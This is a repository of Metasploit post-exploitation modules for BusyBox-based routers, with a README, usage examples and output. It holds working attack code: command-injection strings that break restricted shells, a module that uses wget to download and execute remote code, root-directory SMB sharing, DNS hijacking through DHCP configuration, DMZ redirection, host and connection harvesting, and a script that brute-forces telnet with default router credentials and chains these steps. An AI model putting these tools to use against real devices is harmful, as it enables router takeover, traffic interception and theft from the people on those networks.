├── README.md ├── auto_busybox.rc ├── busybox_control.rb ├── busybox_control.sh ├── busybox_enum_connections.rb ├── busybox_enum_hosts.rb ├── busybox_jailbreak.rb ├── busybox_pingnet.rb ├── busybox_setdmz.rb ├── busybox_setdns.rb ├── busybox_smb_share_root.rb ├── busybox_wgetandexec.rb └── routers_userpass.txt /README.md: -------------------------------------------------------------------------------- 1 |

Details

2 | 3 | Ruby scripts: 4 | 5 | modules/post/linux/gather/busybox_enum_connections.rb 6 | modules/post/linux/gather/busybox_enum_hosts.rb 7 | modules/post/linux/gather/busybox_pingnet.rb 8 | modules/post/linux/manage/busybox_jailbreak.rb 9 | modules/post/linux/manage/busybox_setdmz.rb 10 | modules/post/linux/manage/busybox_setdns.rb 11 | modules/post/linux/manage/busybox_smb_share_root.rb 12 | modules/post/linux/manage/busybox_wgetandexec.rb 13 | 14 | They are post- modules. 15 | 16 | Data: 17 | 18 | routers_userpass.txt 19 | 20 |

busybox_jailbreak.rb

21 | 22 | This module is intended to be applied against a session connected to a limited shell of a device (for example a router) based on busybox (maybe it could work against non-busybox devices but it is oriented to busybox). For example, if you connect by telnet to a router, usually you are received with a limited shell specific for that router. It is common these limited shells to be using busybox commands internally. For example if the limited shell offers the command "cat", it is common it ends up calling busybox cat command. And it is common too to find command injection attacks in these limited shells (i.e. "cat xx || sh" to get the busybox shell in the most of models of comtrend routers). Busybox_jailbreak.rb module tries a set of tricks to break the jailbreak and get your session connected to the busybox ash shell. 23 | 24 | This module will output the command applied for breaking the limited shell in case it was able to break it. 25 | 26 |

Usage

27 | 28 | ``` 29 | use post/linux/manage/busybox_jailbreak 30 | set SESSION 1 31 | set VERBOSE yes 32 | run 33 | ``` 34 | 35 |

Verbose output

36 | 37 | ``` 38 | [*] Running against session 1 39 | SESSION => 1 40 | VERBOSE => yes 41 | [*] jailbreak sent: cat xx || sh 42 | . 43 | [*] jailbreak received: cat xx || sh 44 | . 45 | [*] jailbreak received: cat: xx: No such file or directory 46 | 47 | 48 | BusyBox v1.00 (2010.09.30-13:07+0000) Built-in shell (msh) 49 | Enter 'help' for a list of built-in commands. 50 | 51 | # . 52 | [*] Done method 1_1. 53 | [*] Post module execution completed 54 | ``` 55 | 56 |

busybox_wgetandexec.rb

57 | 58 | This module is intended to be applied against a session connected to a ash busybox shell. It uses the wget command to download a file from a given url. It will try to find a writable directory and it will download the file there. If successful, it executes the file. 59 | 60 |

Usage

61 | 62 | ``` 63 | use post/linux/manage/busybox_wgetandexec 64 | set URL http://192.168.1.128/test.sh 65 | set SESSION 1 66 | set VERBOSE yes 67 | run 68 | ``` 69 | 70 | Note: test.sh is a simple script with ls command. 71 | 72 |

Verbose output

73 | 74 | ``` 75 | [*] Trying to find writable directory. 76 | [*] is_writable_directory: 77 | cat: /etc/SATWTJKPMHQFVTVV: No such file or directory 78 | 79 | [*] is_writable_directory: 80 | RUIQVGSIRGOWTSDPXXXRUIQVGSIRGOWTSDP 81 | 82 | [*] writable directory found, downloading file. 83 | [+] File downloaded using wget. Executing it. 84 | [*] 85 | : not found 86 | bin dev lib mnt proc sys usr webs 87 | data etc linuxrc opt sbin tmp var 88 | [*] Post module execution completed 89 | ``` 90 | 91 |

busybox_smb_share_root.rb

92 | 93 | This module is intended to be applied against a session connected to a ash busybox shell. It tries to modify some SMB configuration files and relaunch SMB service to share the device's root directory. 94 | 95 | After this it could be possible to use SMB modules (i.e. auxiliary/admin/smb/list_directory to enumerate device's directories). Some device's directories are writable (/mnt, /var,...) and you could upload files there. 96 | 97 |

Usage

98 | 99 | ``` 100 | use post/linux/manage/busybox_smb_share_root 101 | set SESSION 1 102 | set VERBOSE yes 103 | run 104 | ``` 105 | 106 |

Verbose output

107 | 108 | ``` 109 | SESSION => 1 110 | VERBOSE => yes 111 | [*] Trying to find smb.conf. 112 | [*] Smb.conf found. 113 | [*] Trying to find writable directory. 114 | [*] is_writable_directory: 115 | cat: /etc/IFHTWYXSOXHDRAPW: No such file or directory 116 | 117 | [*] is_writable_directory: 118 | QTTCDPOAWXDRCLKGXXXQTTCDPOAWXDRCLKG 119 | 120 | [*] writable directory found, copying smb.conf. 121 | [*] 122 | [*] 123 | [*] 124 | [*] 125 | killall: Could not kill pid '688': No such process 126 | [*] 127 | [*] 128 | 129 | Invalid option -s=/mnt/smb.conf: unknown option 130 | 131 | Usage: smbd [-?] [-?DiFSbV] [-?DiFSbV] [-?|--help] [--usage] [-D|--daemon] [-i|--interactive] 132 | [-F|--foreground] [--no-process-group] [-S|--log-stdout] 133 | [-b|--build-options] [-p|--port STRING] 134 | [-P|--profiling-level PROFILE_LEVEL] [-d|--debuglevel DEBUGLEVEL] 135 | [-s|--configfile CONFIGFILE] [-l|--log-basename LOGFILEBASE] 136 | [-V|--version] [--sbindir=SBINDIR] [--bindir=BINDIR] 137 | [--swatdir=SWATDIR] [--lmhostsfile=LMHOSTSFILE] [--libdir=LIBDIR] 138 | [--modulesdir=MODULESDIR] [--shlibext=SHLIBEXT] [--lockdir=LOCKDIR] 139 | [--piddir=PIDDIR] [--smb-passwd-file=SMB_PASSWD_FILE] 140 | [--private-dir=PRIVATE_DIR] 141 | [+] Smb configuration has been modified. 142 | [*] Post module execution completed 143 | ``` 144 | 145 | Note the module will try to relaunch smbd with -s="config file path" and -s "config file path". This is due that depending on the device it can change. This is the reason that verbose output shows this message. 146 | 147 |

busybox_enum_hosts.rb

148 | 149 | This module is intended to be applied against a session connected to a ash busybox shell. It will try to read some typical files where busybox based devices usually store connected hosts (i.e. hosts of the network connected to the router). 150 | 151 | It will shows the results (in verbose mode) and it will store the results in loot. 152 | 153 |

Usage

154 | 155 | ``` 156 | use post/linux/gather/busybox_enum_hosts 157 | set SESSION 1 158 | set VERBOSE yes 159 | run 160 | ``` 161 | 162 |

Verbose output

163 | 164 | ``` 165 | SESSION => 1 166 | VERBOSE => yes 167 | [+] Hosts File found: /var/hosts. 168 | 169 | 127.0.0.1 localhost 170 | 192.168.1.1 Comtrend.Home 171 | 192.168.1.128 JAVIPC 172 | 173 | [+] Hosts saved to C:/metasploit/apps/pro/loot/20150810185547_default_192.168.1.1_Hosts_968928.txt. 174 | [*] Post module execution completed 175 | ``` 176 | 177 | 178 |

busybox_enum_connections.rb

179 | 180 | This module is intented to be applied against a session connected to a busybox ash shell. The script will read some typical files where these devices usually store connections of the hosts connected to the device (usually a router). 181 | 182 | It will shows the results (in verbose mode) and it will store the results in loot. 183 | 184 |

Usage

185 | 186 | ``` 187 | use post/linux/gather/busybox_enum_connections 188 | set SESSION 1 189 | set VERBOSE yes 190 | run 191 | ``` 192 | 193 |

Verbose output

194 | 195 | ``` 196 | SESSION => 1 197 | VERBOSE => yes 198 | [*] Searching for files that store information about network connections. 199 | [+] Connections File found: /proc/net/nf_conntrack. 200 | 201 | cat: /proc/net/nf_conntrack: No such file or directory 202 | 203 | [+] Connections saved to C:/metasploit/apps/pro/loot/20150810185611_default_192.168.1.1_Connections_366635.txt. 204 | [+] Connections File found: /proc/net/ip_conntrack. 205 | 206 | cat: /proc/net/ip_conntrack: No such file or directory 207 | 208 | [+] Connections saved to C:/metasploit/apps/pro/loot/20150810185611_default_192.168.1.1_Connections_884242.txt. 209 | [+] Connections File found: /proc/net/tcp. 210 | 211 | sl local_address rem_address st tx_queue rx_queue tr tm->when retrnsmt uid timeout inode 212 | 0: 00000000:008B 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 2783 1 8397f0c0 299 0 0 2 -1 213 | 1: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 557 1 8397e040 299 0 0 2 -1 214 | 2: 00000000:AD71 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 166 1 8397f900 299 0 0 2 -1 215 | 3: C0A80101:06F4 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 1748 1 82c4f910 299 0 0 2 -1 216 | 4: 00000000:0015 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 560 1 8397eca0 299 0 0 2 -1 217 | 5: 00000000:7535 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 556 1 8397f4e0 299 0 0 2 -1 218 | 6: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 559 1 8397e880 299 0 0 2 -1 219 | 7: 00000000:0017 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 558 1 8397e460 299 0 0 2 -1 220 | 8: C0A80101:0017 C0A80180:7EEF 01 0000003B:00000000 01:00000016 00000000 0 0 2813 5 82c4e050 23 3 1 6 -1 221 | 222 | [+] Connections saved to C:/metasploit/apps/pro/loot/20150810185612_default_192.168.1.1_Connections_515615.txt. 223 | [+] Connections File found: /proc/net/udp. 224 | 225 | sl local_address rem_address st tx_queue rx_queue tr tm->when retrnsmt uid timeout inode ref pointer drops 226 | 9: C0A80101:0089 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 863 2 828ab960 0 227 | 9: 00000000:0089 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 860 2 828abd00 0 228 | 10: C0A80101:008A 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 864 2 828ab790 0 229 | 10: 00000000:008A 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 861 2 828abb30 0 230 | 16: 7F000001:9490 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 1895 2 82c64d10 0 231 | 36: 7F000001:9CA4 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 1749 2 828ab220 0 232 | 53: 00000000:0035 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 187 2 83972cf0 0 233 | 67: 00000000:0043 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 226 2 83972210 0 234 | 69: 00000000:0045 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 561 2 839723e0 0 235 | 80: 00000000:C350 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 1872 2 828ab3f0 0 236 | 96: 00000000:B060 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 188 2 83972b20 0 237 | 106: 00000000:13EA 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 581 2 83972950 0 238 | 107: 00000000:13EB 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 580 2 83972780 0 239 | 108: 00000000:076C 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 1744 2 828ab050 0 240 | 108: 00000000:13EC 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 579 2 839725b0 0 241 | 112: 00000000:9470 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 1874 2 828ab5c0 0 242 | 112: 00000000:C370 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 542 2 83972040 0 243 | 244 | [+] Connections saved to C:/metasploit/apps/pro/loot/20150810185612_default_192.168.1.1_Connections_005935.txt. 245 | [+] Connections File found: /proc/net/arp. 246 | 247 | IP address HW type Flags HW address Mask Device 248 | 192.168.1.128 0x1 0x2 f0:79:59:6c:7b:fd * br0 249 | 250 | [+] Connections saved to C:/metasploit/apps/pro/loot/20150810185613_default_192.168.1.1_Connections_274634.txt. 251 | [+] Connections File found: /proc/fcache/*. 252 | 253 | cat: /proc/fcache/*: No such file or directory 254 | 255 | [+] Connections saved to C:/metasploit/apps/pro/loot/20150810185613_default_192.168.1.1_Connections_152446.txt. 256 | [*] Post module execution completed 257 | ``` 258 | 259 |

busybox_setdmz.rb

260 | 261 | This module is intented to be applied against a session connected to a busybox ash shell. It will use iptables to enable or disable redirection of the traffic from WAN interface to a hosts in the network. 262 | 263 |

Usage

264 | 265 | Creating DMZ: 266 | 267 | ``` 268 | set TARGETHOST 192.168.1.128 269 | set SESSION 1 270 | set VERBOSE yes 271 | set DELETE false 272 | run 273 | ``` 274 | 275 | Deleting DMZ: 276 | 277 | ``` 278 | set TARGETHOST 192.168.1.128 279 | set SESSION 1 280 | set VERBOSE yes 281 | set DELETE true 282 | run 283 | ``` 284 | 285 |

Verbose output

286 | 287 | ``` 288 | TARGETHOST => 192.168.1.128 289 | SESSION => 1 290 | VERBOSE => yes 291 | DELETE => false 292 | [*] Executing iptables to add dmz. 293 | [*] 294 | [*] 295 | Chain INPUT (policy ACCEPT) 296 | target prot opt source destination 297 | 298 | Chain FORWARD (policy ACCEPT) 299 | target prot opt source destination 300 | ACCEPT all -- anywhere 192.168.1.128 301 | 302 | Chain OUTPUT (policy ACCEPT) 303 | target prot opt source destination 304 | [+] Dmz modified. Enable verbose for additional information. 305 | [*] Post module execution completed 306 | ``` 307 | 308 |

busybox_setdns.rb

309 | 310 | This module is intented to be applied against a session connected to a busybox ash shell. It will tries to modify the used DNS address of the device. This DNS address will be given by DHCP to the hosts of the network that connect to the device. The module could be used together with fakedns module to redirect hosts to fake addresses. 311 | 312 |

Usage

313 | 314 | ``` 315 | use post/linux/manage/busybox_setdns 316 | set SRVHOST 8.8.8.8 317 | set SESSION 1 318 | set VERBOSE yes 319 | run 320 | ``` 321 | 322 |

Verbose output

323 | 324 | ``` 325 | SRVHOST => 8.8.8.8 326 | SESSION => 1 327 | VERBOSE => yes 328 | [*] Searching for files to modify dns server. 329 | [*] Resolv.conf found. 330 | [+] Dns server added to resolv.conf. 331 | [*] Udhcpd.conf found. 332 | [*] Original udhcpd.conf content: 333 | [*] 334 | decline_file /var/udhcpd.decline 335 | interface br0 336 | start 192.168.1.128 337 | end 192.168.1.160 338 | option lease 259200 339 | min_lease 30 340 | option subnet 255.255.255.0 341 | option router 192.168.1.1 342 | option dns 87.216.1.65 343 | option dns 87.216.1.66 344 | option domain Home 345 | 346 | [*] Udhcpd.conf is writable. 347 | [*] Relaunching udhcp server: 348 | [+] Udhcpd.conf modified and dns server added. Dhcpd restarted. 349 | [*] Post module execution completed 350 | ``` 351 | 352 |

busybox_pingnet.rb

353 | 354 | This module is intented to be applied against a session connected to a busybox ash shell. It will send an ash script to the busybox shell. This script will ping a range of addresses from the busybox device. 355 | 356 | The module will show the results (in verbose mode) and it will store the results in loot. 357 | 358 |

Usage

359 | 360 | ``` 361 | use post/linux/gather/busybox_pingnet 362 | set IPRANGESTART 192.168.1.1 363 | set IPRANGEEND 192.168.1.10 364 | set SESSION 1 365 | set VERBOSE yes 366 | run 367 | ``` 368 | 369 |

Verbose output

370 | 371 | ``` 372 | [*] Script has been sent to the busybox device. Doing ping to the range of addresses. 373 | [*] done 374 | PING 192.168.1.1 (192.168.1.1): 56 data bytes 375 | 56 bytes from 192.168.1.1: icmp_seq=0 ttl=64 time=0.3 ms 376 | 377 | --- 192.168.1.1 ping statistics --- 378 | 1 packets transmitted, 1 packets received, 0% packet loss 379 | round-trip min/avg/max = 0.3/0.3/0.3 ms 380 | PING 192.168.1.2 (192.168.1.2): 56 data bytes 381 | 382 | [*] No response. 383 | [*] 384 | --- 192.168.1.2 ping statistics --- 385 | 1 packets transmitted, 0 packets received, 100% packet loss 386 | PING 192.168.1.3 (192.168.1.3): 56 data bytes 387 | 388 | [*] No response. 389 | [*] No response. 390 | [*] 391 | --- 192.168.1.3 ping statistics --- 392 | 1 packets transmitted, 0 packets received, 100% packet loss 393 | 394 | [*] PING 192.168.1.4 (192.168.1.4): 56 data bytes 395 | 396 | [*] No response. 397 | [*] 398 | 399 | [*] --- 192.168.1.4 ping statistics --- 400 | 1 packets transmitted, 0 packets received, 100% packet loss 401 | PING 192.168.1.5 (192.168.1.5): 56 data bytes 402 | 403 | [*] No response. 404 | [*] 405 | 406 | [*] --- 192.168.1.5 ping statistics --- 407 | 1 packets transmitted, 0 packets received, 100% packet loss 408 | PING 192.168.1.6 (192.168.1.6): 56 data bytes 409 | 410 | [*] No response. 411 | [*] 412 | 413 | [*] --- 192.168.1.6 ping statistics --- 414 | 1 packets transmitted, 0 packets received, 100% packet loss 415 | PING 192.168.1.7 (192.168.1.7): 56 data bytes 416 | 417 | [*] No response. 418 | [*] 419 | 420 | [*] --- 192.168.1.7 ping statistics --- 421 | 1 packets transmitted, 0 packets received, 100% packet loss 422 | PING 192.168.1.8 (192.168.1.8): 56 data bytes 423 | 424 | [*] No response. 425 | [*] 426 | 427 | [*] --- 192.168.1.8 ping statistics --- 428 | 1 packets transmitted, 0 packets received, 100% packet loss 429 | PING 192.168.1.9 (192.168.1.9): 56 data bytes 430 | 431 | [*] No response. 432 | [*] No response. 433 | [*] 434 | 435 | [*] --- 192.168.1.9 ping statistics --- 436 | 1 packets transmitted, 0 packets received, 100% packet loss 437 | PING 192.168.1.10 (192.168.1.10): 56 data bytes 438 | 439 | [*] No response. 440 | [*] 441 | 442 | [*] --- 192.168.1.10 ping statistics --- 443 | 1 packets transmitted, 0 packets received, 100% packet loss 444 | # 445 | [*] No response. 446 | [*] No response. 447 | [*] No response. 448 | [*] No response. 449 | [*] No response. 450 | [*] No response. 451 | [*] No response. 452 | [*] No response. 453 | [*] No response. 454 | [*] No response. 455 | [*] No response. 456 | [*] No response. 457 | [*] No response. 458 | [*] No response. 459 | [*] No response. 460 | [+] Pingnet results saved to C:/metasploit/apps/pro/loot/20150810195356_default_192.168.1.1_Pingnet_780236.txt. 461 | [*] Post module execution completed 462 | ``` 463 | 464 | Note: the results saved in loot will only contain the ping command answer, not the verbose output like "No response". 465 | 466 |

routers_userpass.txt

467 | 468 | I added a list of well-known default router users/passwords. I think it is interested to bruteforce against telnet or http without needing to use a longer wordlist. 469 | -------------------------------------------------------------------------------- /auto_busybox.rc: -------------------------------------------------------------------------------- 1 | # auto_busybox.rc 2 | 3 | 4 | 5 | def prepare_session() 6 | run_single("sessions -K") 7 | run_single("use auxiliary/scanner/telnet/telnet_login") 8 | run_single("set userpass_file C:/metasploit/apps/pro/msf3/data/wordlists/routers_userpass.txt") 9 | run_single("set STOP_ON_SUCCESS true") 10 | run_single("set RHOSTS #{framework.datastore['RHOSTS']}") 11 | run_single("set VERBOSE yes") 12 | run_single("run") 13 | sleep 1 14 | framework.sessions.each_key do |session| 15 | print_status("Running against session #{session}") 16 | sleep 1 17 | run_single("use post/linux/manage/busybox_jailbreak") 18 | run_single("set SESSION #{session}") 19 | run_single("set VERBOSE yes") 20 | run_single("run") 21 | sleep 1 22 | return session 23 | end 24 | end 25 | 26 | if (framework.datastore['RHOSTS'] == nil) 27 | print_status("you have to set RHOSTS globally ... exiting") 28 | return 29 | end 30 | 31 | if (framework.datastore['TARGETHOST'] == nil) 32 | print_status("you have to set TARGETHOST globally ... exiting") 33 | return 34 | end 35 | 36 | if (framework.datastore['DNSSRV'] == nil) 37 | print_status("you have to set DNSSRV globally ... exiting") 38 | return 39 | end 40 | 41 | if (framework.datastore['STARTIP'] == nil) 42 | print_status("you have to set STARTIP globally ... exiting") 43 | return 44 | end 45 | 46 | if (framework.datastore['ENDIP'] == nil) 47 | print_status("you have to set STARTIP globally ... exiting") 48 | return 49 | end 50 | 51 | print_line("") 52 | print_line("starting ...") 53 | print_line("") 54 | 55 | session=prepare_session() 56 | run_single("use post/linux/manage/busybox_wgetandexec") 57 | run_single("set URL http://#{framework.datastore['TARGETHOST']}/test.sh") 58 | run_single("set SESSION #{session}") 59 | run_single("set VERBOSE yes") 60 | run_single("run") 61 | sleep 1 62 | 63 | session=prepare_session() 64 | run_single("use post/linux/manage/busybox_smb_share_root") 65 | run_single("set SESSION #{session}") 66 | run_single("set VERBOSE yes") 67 | run_single("run") 68 | sleep 1 69 | 70 | session=prepare_session() 71 | run_single("use post/linux/gather/busybox_enum_hosts") 72 | run_single("set SESSION #{session}") 73 | run_single("set VERBOSE yes") 74 | run_single("run") 75 | sleep 1 76 | 77 | session=prepare_session() 78 | run_single("use post/linux/gather/busybox_enum_connections") 79 | run_single("set SESSION #{session}") 80 | run_single("set VERBOSE yes") 81 | run_single("run") 82 | sleep 1 83 | 84 | session=prepare_session() 85 | run_single("use post/linux/manage/busybox_setdmz") 86 | run_single("set TARGETHOST #{framework.datastore['TARGETHOST']}") 87 | run_single("set SESSION #{session}") 88 | run_single("set VERBOSE yes") 89 | run_single("set DELETE false") 90 | run_single("run") 91 | sleep 1 92 | 93 | session=prepare_session() 94 | run_single("use post/linux/manage/busybox_setdmz") 95 | run_single("set TARGETHOST #{framework.datastore['TARGETHOST']}") 96 | run_single("set SESSION #{session}") 97 | run_single("set VERBOSE yes") 98 | run_single("set DELETE true") 99 | run_single("run") 100 | sleep 1 101 | 102 | session=prepare_session() 103 | run_single("use post/linux/manage/busybox_setdns") 104 | run_single("set SRVHOST #{framework.datastore['DNSSRV']}") 105 | run_single("set SESSION #{session}") 106 | run_single("set VERBOSE yes") 107 | run_single("run") 108 | sleep 1 109 | 110 | session=prepare_session() 111 | run_single("use post/linux/gather/busybox_pingnet") 112 | run_single("set IPRANGESTART #{framework.datastore['STARTIP']}") 113 | run_single("set IPRANGEEND #{framework.datastore['ENDIP']}") 114 | run_single("set SESSION #{session}") 115 | run_single("set VERBOSE yes") 116 | run_single("run") 117 | sleep 1 118 | 119 | 120 | #session=prepare_session() 121 | #run_single("use post/linux/manage/busybox_control") 122 | #run_single("set SESSION #{session}") 123 | #run_single("run") 124 | #sleep 1 125 | #run_single("sessions -i #{session}") 126 | 127 | 128 | 129 | 130 | 131 | 132 | -------------------------------------------------------------------------------- /busybox_control.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class Metasploit3 < Msf::Post 9 | 10 | def initialize 11 | super( 12 | 'Name' => 'BusyBox Remote Control ', 13 | 'Description' => 'This module will send a script to a open session 14 | that is connected to a BusyBox sh shell. The script 15 | will accept some commands to control the target 16 | router or device executing BusyBox. Once the 17 | script is executed it will accept commands, use 18 | the help command to list the options of the script', 19 | 'Author' => 'Javier Vicente Vallejo', 20 | 'License' => MSF_LICENSE, 21 | 'References' => 22 | [ 23 | [ 'URL', 'http://vallejo.cc'] 24 | ], 25 | 'Platform' => ['linux'], 26 | 'SessionTypes' => ['shell'] 27 | ) 28 | end 29 | 30 | 31 | 32 | def run 33 | 34 | 35 | file = ::File.join(Msf::Config.data_directory, "post", "busybox_control.sh") 36 | 37 | count = 0 38 | 39 | ::File.open(file, "rb") do |f| 40 | while line = f.gets 41 | vprint_status(line) 42 | line = line.strip 43 | session.shell_write(line + "\n") 44 | count+=1 45 | if count%20==0 46 | session.shell_read() 47 | Rex::sleep(0.001) 48 | end 49 | end 50 | end 51 | 52 | vprint_status("BusyBox script sent.\n") 53 | 54 | end 55 | 56 | end 57 | -------------------------------------------------------------------------------- /busybox_control.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vallejocc/Hacking-Busybox-Control/6a8e1e0594ba10cae1895f9fa013f112301e3873/busybox_control.sh -------------------------------------------------------------------------------- /busybox_enum_connections.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class Metasploit3 < Msf::Post 9 | 10 | include Msf::Post::File 11 | 12 | def initialize 13 | super( 14 | 'Name' => 'BusyBox Enumerate Connections', 15 | 'Description' => 'This module will be applied on a session connected 16 | to a BusyBox sh shell. The script will enumerate 17 | the connections established by the hosts connected 18 | to the router or device executing BusyBox.', 19 | 'Author' => 'Javier Vicente Vallejo', 20 | 'License' => MSF_LICENSE, 21 | 'References' => 22 | [ 23 | [ 'URL', 'http://vallejo.cc'] 24 | ], 25 | 'Platform' => ['linux'], 26 | 'SessionTypes' => ['shell'] 27 | ) 28 | end 29 | 30 | 31 | 32 | def run 33 | found = false 34 | conns_files =[ 35 | "/proc/net/nf_conntrack", "/proc/net/ip_conntrack", "/proc/net/tcp", "/proc/net/udp", "/proc/net/arp", "/proc/fcache/*" 36 | ] 37 | vprint_status("Searching for files that store information about network connections.") 38 | conns_files.each do |conns_file| 39 | if file_exists(conns_file) 40 | found = true 41 | print_good("Connections File found: #{conns_file}.") 42 | begin 43 | str_file=read_file(conns_file) 44 | vprint_line(str_file) 45 | #Store file 46 | p = store_loot("Connections", "text/plain", session, str_file, conns_file, "BusyBox Device Network Established Connections") 47 | print_good("Connections saved to #{p}.") 48 | rescue EOFError 49 | # If there's nothing in the file, we hit EOFError 50 | print_error("Nothing read from file #{conns_file}, file may be empty.") 51 | end 52 | end 53 | end 54 | if found == false 55 | print_error("Nothing read from connection files, files may be empty.") 56 | end 57 | end 58 | 59 | #file? doesnt work because test -f is not implemented in busybox 60 | def file_exists(file_path) 61 | s = read_file(file_path) 62 | if s and s.length 63 | return true 64 | end 65 | return false 66 | end 67 | 68 | end 69 | -------------------------------------------------------------------------------- /busybox_enum_hosts.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class Metasploit3 < Msf::Post 9 | 10 | include Msf::Post::File 11 | 12 | def initialize 13 | super( 14 | 'Name' => 'BusyBox Enumerate Hosts', 15 | 'Description' => 'This module will be applied on a session connected 16 | to a BusyBox sh shell. The script will enumerate 17 | the hosts connected to the router or device executing 18 | BusyBox.', 19 | 'Author' => 'Javier Vicente Vallejo', 20 | 'License' => MSF_LICENSE, 21 | 'References' => 22 | [ 23 | [ 'URL', 'http://vallejo.cc'] 24 | ], 25 | 'Platform' => ['linux'], 26 | 'SessionTypes' => ['shell'] 27 | ) 28 | end 29 | 30 | def run 31 | hosts_file = nil 32 | if file_exists("/var/hosts") 33 | hosts_file = "/var/hosts" 34 | elsif file_exists("/var/udhcpd/udhcpd.leases") 35 | hosts_file = "/var/udhcpd/udhcpd.leases" 36 | else 37 | vprint_error("Files not found: /var/hosts, /var/udhcpd/udhcpd.leases.") 38 | return 39 | end 40 | #File exists 41 | begin 42 | str_file=read_file(hosts_file) 43 | print_good("Hosts File found: #{hosts_file}.") 44 | vprint_line(str_file) 45 | #Store file 46 | p = store_loot("Hosts", "text/plain", session, str_file, hosts_file, "BusyBox Device Connected Hosts") 47 | print_good("Hosts saved to #{p}.") 48 | rescue EOFError 49 | # If there's nothing in the file, we hit EOFError 50 | print_error("Nothing read from file: #{hosts_file}, file may be empty.") 51 | end 52 | end 53 | 54 | #file? doesnt work because test -f is not implemented in busybox 55 | def file_exists(file_path) 56 | s = read_file(file_path) 57 | if s and s.length 58 | return true 59 | end 60 | return false 61 | end 62 | 63 | end 64 | -------------------------------------------------------------------------------- /busybox_jailbreak.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class Metasploit3 < Msf::Post 9 | 10 | def initialize 11 | super( 12 | 'Name' => 'BusyBox Jailbreak ', 13 | 'Description' => 'This module will send a set of commands to a open 14 | session that is connected to a BusyBox limited shell 15 | (i.e. a router limited shell). It will try different 16 | known tricks to try to jailbreak the limited shell and 17 | get a full sh busybox shell.', 18 | 'Author' => 'Javier Vicente Vallejo', 19 | 'License' => MSF_LICENSE, 20 | 'References' => 21 | [ 22 | [ 'URL', 'http://vallejo.cc'] 23 | ], 24 | 'Platform' => ['linux'], 25 | 'SessionTypes' => ['shell'] 26 | ) 27 | end 28 | 29 | def run 30 | bfound = false 31 | bfound = try_command("cat xx || sh\n","1_1") unless bfound 32 | bfound = try_command("ping || sh\n","1_2") unless bfound 33 | bfound = try_command("echo `sh >> /dev/ttyp0`\n","2_1") unless bfound 34 | bfound = try_command("ping `sh >> /dev/ttyp0`\n","2_2") unless bfound 35 | bfound = try_command("cat `sh >> /dev/ttyp0`\n","2_3") unless bfound 36 | bfound = try_command("cat xx;sh\n","3_1") unless bfound 37 | bfound = try_command("echo xx;sh\n","3_2") unless bfound 38 | bfound = try_command("ping;sh\n","3_3") unless bfound 39 | bfound = try_command("cat xx | sh\n","4_1") unless bfound 40 | bfound = try_command("ping | sh\n","4_2") unless bfound 41 | bfound = try_command("cat ($sh)\n","5_1") unless bfound 42 | bfound = try_command("echo ($sh) xx\n","5_2") unless bfound 43 | bfound = try_command("ping ($sh)\n","5_3") unless bfound 44 | bfound = try_command("cat xx && sh\n","6_1") unless bfound 45 | bfound = try_command("echo xx && sh\n","6_2") unless bfound 46 | bfound = try_command("ping && sh\n","3_3") unless bfound 47 | print_error("Unable to jailbreak device shell.") if !bfound 48 | end 49 | 50 | def try_command(param_command, method_number) 51 | vprint_status("jailbreak sent: #{param_command}.") 52 | session.shell_write(param_command) 53 | (1..10).each do 54 | resp = session.shell_read() 55 | vprint_status("jailbreak received: #{resp}.") 56 | if ((resp.include? "BusyBox") && (resp.include? "Built-in shell")) 57 | vprint_status("Done method " + method_number + ".") 58 | return true 59 | end 60 | end 61 | return false 62 | end 63 | 64 | end 65 | -------------------------------------------------------------------------------- /busybox_pingnet.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class Metasploit3 < Msf::Post 9 | 10 | include Msf::Post::File 11 | 12 | def initialize 13 | super( 14 | 'Name' => 'BusyBox Ping Network', 15 | 'Description' => 'This module will be applied on a session connected 16 | to a BusyBox sh shell. The script will ping a range of 17 | ip adresses from the router or device executing BusyBox.', 18 | 'Author' => 'Javier Vicente Vallejo', 19 | 'License' => MSF_LICENSE, 20 | 'References' => 21 | [ 22 | [ 'URL', 'http://vallejo.cc'] 23 | ], 24 | 'Platform' => ['linux'], 25 | 'SessionTypes' => ['shell'] 26 | ) 27 | 28 | register_options( 29 | [ 